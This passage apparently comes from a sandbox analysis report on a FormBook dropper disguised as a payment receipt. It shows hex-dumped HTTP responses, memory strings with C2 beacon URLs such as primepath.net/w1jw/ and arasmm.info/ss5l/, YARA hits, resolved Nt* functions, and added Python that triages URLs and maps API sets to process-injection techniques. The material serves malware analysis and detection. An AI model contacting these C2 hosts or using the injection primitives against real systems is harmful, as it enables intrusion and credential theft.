6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 24 Feb 2025 09:27:45 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 
68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36
                Source: wlanext.exe, 00000011.00000002.4519605588.00000000048DC000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.000000000324C000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                Source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.dr | String found in binary or memory: http://ocsp.comodoca.com0
                Source: wlanext.exe, 00000011.00000002.4519605588.000000000474A000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.00000000030BA000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: http://primepath.net/w1jw/?fjF4t=FEsgf818Qy4NuwHBEIOvD988sEsBYT1YIqxYhkBisKCh
                Source: PAYMENT RECEIPT_USD21,000.exe, 00000000.00000002.2120736278.0000000002D7A000.00000004.00000800.00020000.00000000.sdmp, fttQgpyzkkc.exe, 0000000A.00000002.2220394453.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.dr | String found in binary or memory: http://tempuri.org/EchipamenteDataSet.xsd
                Source: VfJW2xm7a.exe, 00000012.00000002.4520833755.0000000004CC5000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.arasmm.info
                Source: VfJW2xm7a.exe, 00000012.00000002.4520833755.0000000004CC5000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.arasmm.info/ss5l/
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: wlanext.exe, 00000011.00000002.4519605588.0000000004F24000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.0000000003894000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2N
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=10336
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: wlanext.exe, 00000011.00000002.4517846473.0000000003448000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: wlanext.exe, 00000011.00000003.2458767739.0000000008233000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: wlanext.exe, 00000011.00000002.4519605588.0000000004A6E000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.00000000033DE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://static.mydevil.net/grad.png
                Source: wlanext.exe, 00000011.00000002.4519605588.0000000004A6E000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.00000000033DE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://static.mydevil.net/logo5.png
                Source: PAYMENT RECEIPT_USD21,000.exe, fttQgpyzkkc.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: wlanext.exe, 00000011.00000003.2464492291.000000000825D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: wlanext.exe, 00000011.00000002.4519605588.0000000004A6E000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.00000000033DE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.mydevil.net
                Source: wlanext.exe, 00000011.00000002.4519605588.0000000004A6E000.00000004.10000000.00040000.00000000.sdmp, VfJW2xm7a.exe, 00000012.00000002.4519083493.00000000033DE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.mydevil.net/favicon.ico
                Source: VfJW2xm7a.exe, 00000012.00000002.4519083493.00000000033DE000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.mydevil.net/kontakt.html
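                The string list above mixes three very different kinds of URL: the FormBook beacon and C2 path (http://primepath.net/w1jw/?fjF4t=..., http://www.arasmm.info/ss5l/) pulled from the memory of the injected wlanext.exe and VfJW2xm7a.exe processes; CRL/OCSP URLs that belong to a certificate chain embedded in the dropper (the trailing "0q", "0t", "0" are DER length bytes, not part of the URL); and search-engine and login.live.com URLs of the kind found in browser profile data, which fits the report's "Tries to harvest and steal browser information" finding. The mydevil.net and cdnjs normalize.css strings match the bodies of the 404 pages received above. The Python below is an added example, not part of the Joe Sandbox report, that triages such a list so the analyst sees the C2 candidates first. The host allowlist and the FormBook path heuristic (short lowercase alphanumeric directory plus a single query parameter carrying an encoded blob) are assumptions of the example, and the sample strings are re-typed from the entries above.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample input: a subset of the strings listed above, re-typed here.
SAMPLE_STRINGS = [
    "http://primepath.net/w1jw/?fjF4t=FEsgf818Qy4NuwHBEIOvD988sEsBYT1YIqxYhkBisKCh",
    "http://www.arasmm.info/ss5l/",
    "http://www.arasmm.info",
    "http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t",
    "http://ocsp.comodoca.com0",
    "https://duckduckgo.com/ac/?q=",
    "https://ac.ecosia.org/autocomplete?q=",
    "https://login.live.com/oauth20_desktop.srf?lc=1033",
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name",
    "https://static.mydevil.net/grad.png",
]

# Hosts that typically come from harvested browser/OS data rather than malware config.
# This allowlist is an assumption of the example, not something the report states.
BROWSER_PROFILE_HOSTS = (
    "duckduckgo.com", "ecosia.org", "search.yahoo.com", "google.com", "login.live.com",
)

# FormBook beacon shape (heuristic): a short lowercase alphanumeric directory such as
# /w1jw/ or /ss5l/, optionally followed by one query parameter holding encoded data.
FORMBOOK_PATH_RE = re.compile(r"^/[a-z0-9]{3,6}/$")


def _host_matches(host, suffixes):
    return any(host == s or host.endswith("." + s) for s in suffixes)


def classify(url):
    """Return a coarse category for one URL-like string pulled from process memory."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if host.startswith(("crl.", "ocsp.")):
        return "pki"  # certificate chain residue; trailing DER bytes are ignored
    if _host_matches(host, BROWSER_PROFILE_HOSTS):
        return "browser_profile"
    if FORMBOOK_PATH_RE.match(parts.path):
        params = parse_qsl(parts.query, keep_blank_values=True)
        if len(params) == 1 and len(params[0][1]) >= 20:
            return "formbook_beacon"  # directory + one parameter with a long encoded value
        if not parts.query:
            return "formbook_path"    # bare C2 directory as stored in the config
    return "other"


def formbook_candidates(strings):
    """Extract (host, path, query parameter name) for strings that look like FormBook C2."""
    out = []
    for s in strings:
        if classify(s) in ("formbook_beacon", "formbook_path"):
            p = urlsplit(s)
            param = p.query.split("=", 1)[0] if p.query else None
            out.append((p.hostname, p.path, param))
    return out


def triage(strings):
    """Group strings by category so profile and PKI noise can be set aside."""
    groups = {}
    for s in strings:
        groups.setdefault(classify(s), []).append(s)
    return groups


if __name__ == "__main__":
    for category, urls in triage(SAMPLE_STRINGS).items():
        print(category)
        for u in urls:
            print("   ", u)
    print("C2 candidates:", formbook_candidates(SAMPLE_STRINGS))
```

                Run against the full list, this leaves two candidates (primepath.net/w1jw/ with parameter fjF4t, and www.arasmm.info/ss5l/) and pushes the browser and certificate strings out of the way; the 404 responses above are consistent with FormBook's habit of cycling through several configured hosts, most of which are parked or decoy domains.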

                E-Banking Fraud

                Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000011.00000002.4517196655.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.4517755223.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2279407307.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2280315189.0000000000FE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.4517662913.0000000003370000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.2281808721.0000000001580000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000010.00000002.4518790088.0000000003230000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: initial sample | Static PE information: Filename: PAYMENT RECEIPT_USD21,000.exe
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0042C933 NtClose
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_011235C0 NtCreateMutant,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122B60 NtClose,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122DF0 NtQuerySystemInformation,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122C70 NtFreeVirtualMemory,LdrInitializeThunk
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01123010 NtOpenDirectoryObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01123090 NtSetValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01124340 NtSetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01124650 NtSuspendThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_011239B0 NtGetContextThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122B80 NtQueryInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122BA0 NtEnumerateValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122BF0 NtAllocateVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122BE0 NtQueryValueKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122AB0 NtWaitForSingleObject
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122AD0 NtReadFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122AF0 NtWriteFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122D10 NtMapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01123D10 NtOpenProcessToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122D00 NtSetInformationFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122D30 NtUnmapViewOfSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01123D70 NtOpenThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122DB0 NtEnumerateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122DD0 NtDelayExecution
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122C00 NtQueryInformationProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122C60 NtCreateKey
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122CA0 NtQueryInformationToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122CC0 NtQueryVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122CF0 NtOpenProcess
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122F30 NtCreateSection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122F60 NtCreateProcessEx
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122F90 NtProtectVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122FB0 NtResumeThread
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122FA0 NtQuerySection
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122FE0 NtCreateFile
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122E30 NtWriteVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122E80 NtReadVirtualMemory
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122EA0 NtAdjustPrivilegesToken
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_01122EE0 NtQueueApcThread
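                The native functions resolved in RegSvcs.exe above are the building blocks behind the injection signatures in the report header (writes to foreign memory regions, thread context modification, APC queueing, PE injection into a foreign process). The report lists resolved functions, not an ordered call trace, so what can be checked from it is coverage: does the set contain every primitive a given technique needs? The Python below is an added example, not part of the Joe Sandbox report; the mapping from injection technique to required primitives is the example's own heuristic (an assumption, not a published taxonomy), and the sample list is re-typed from the entries above.

```python
# Constructed sample: the Nt* functions resolved in RegSvcs.exe (process 9) as listed
# above, re-typed as plain names. This is a set of resolved functions, not a call trace.
OBSERVED_CALLS = [
    "NtClose", "NtCreateMutant", "NtQuerySystemInformation", "NtFreeVirtualMemory",
    "NtOpenDirectoryObject", "NtSetValueKey", "NtSetContextThread", "NtSuspendThread",
    "NtGetContextThread", "NtQueryInformationFile", "NtEnumerateValueKey",
    "NtAllocateVirtualMemory", "NtQueryValueKey", "NtWaitForSingleObject", "NtReadFile",
    "NtWriteFile", "NtMapViewOfSection", "NtOpenProcessToken", "NtSetInformationFile",
    "NtUnmapViewOfSection", "NtOpenThread", "NtEnumerateKey", "NtDelayExecution",
    "NtQueryInformationProcess", "NtCreateKey", "NtQueryInformationToken",
    "NtQueryVirtualMemory", "NtOpenProcess", "NtCreateSection", "NtCreateProcessEx",
    "NtProtectVirtualMemory", "NtResumeThread", "NtQuerySection", "NtCreateFile",
    "NtWriteVirtualMemory", "NtReadVirtualMemory", "NtAdjustPrivilegesToken",
    "NtQueueApcThread",
]

# Heuristic mapping (an assumption of this example, not from the report): each technique
# is a list of requirement groups, and a process covers the technique when at least one
# function from every group is present.
TECHNIQUES = {
    "process_hollowing": [
        {"NtCreateProcessEx"},            # create the host process (suspended)
        {"NtUnmapViewOfSection"},         # carve out its original image
        {"NtWriteVirtualMemory"},         # write the payload into the hole
        {"NtSetContextThread"},           # redirect the primary thread's entry point
        {"NtResumeThread"},               # let it run
    ],
    "section_mapping": [
        {"NtOpenProcess", "NtCreateProcessEx"},
        {"NtCreateSection"},              # a section object holds the payload
        {"NtMapViewOfSection"},           # mapped into the target without a memory write
        {"NtSetContextThread", "NtQueueApcThread", "NtResumeThread"},
    ],
    "apc_injection": [
        {"NtOpenProcess", "NtCreateProcessEx"},
        {"NtAllocateVirtualMemory", "NtMapViewOfSection"},
        {"NtWriteVirtualMemory"},
        {"NtQueueApcThread"},             # execution via a user-mode APC on a target thread
    ],
    "thread_hijack": [
        {"NtOpenThread"},
        {"NtSuspendThread"},
        {"NtGetContextThread"},
        {"NtSetContextThread"},
        {"NtResumeThread"},
    ],
}


def missing_primitives(calls):
    """For each technique, the requirement groups (sorted) that no observed call satisfies."""
    seen = set(calls)
    return {
        name: [sorted(group) for group in groups if not (group & seen)]
        for name, groups in TECHNIQUES.items()
    }


def complete_techniques(calls):
    """Techniques for which every requirement group is satisfied, sorted by name."""
    return sorted(name for name, missing in missing_primitives(calls).items() if not missing)


if __name__ == "__main__":
    print("RegSvcs.exe covers:", complete_techniques(OBSERVED_CALLS))
    # A process that only inspects another (a task manager, say) completes no chain.
    inspector = ["NtOpenProcess", "NtQueryInformationProcess", "NtClose"]
    print("inspector covers:", complete_techniques(inspector))
    partial = ["NtOpenProcess", "NtCreateSection", "NtMapViewOfSection"]
    for name, missing in missing_primitives(partial).items():
        print(name, "missing:", missing)
```

                The RegSvcs.exe set completes all four chains, which is what a hollowed host running a FormBook payload looks like; a full chain is a far stronger signal than any single NtWriteVirtualMemory or NtQueueApcThread on its own. Because the functions sit at 0x0112xxxx rather than in ntdll's own image, user-mode hooks on these APIs would not see them, which is consistent with the report's direct/indirect syscall finding.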
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Code function: 0_2_02B44210
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Code function: 0_2_02B46F90
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Code function: 0_2_02B4DE74
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Code function: 0_2_07296040
                Source: C:\Users\user\Desktop\PAYMENT RECEIPT_USD21,000.exe | Code function: 0_2_07297030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_004188E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_004100B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_004011B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0040E2CA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_004102D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0040E2D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00416AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00416AF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_004022A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00402BA2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00402BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0040247C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0040E41F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0040E423
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0040E4E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00402480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0042EEF3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00402770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_00402FD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 9_2_0118A118
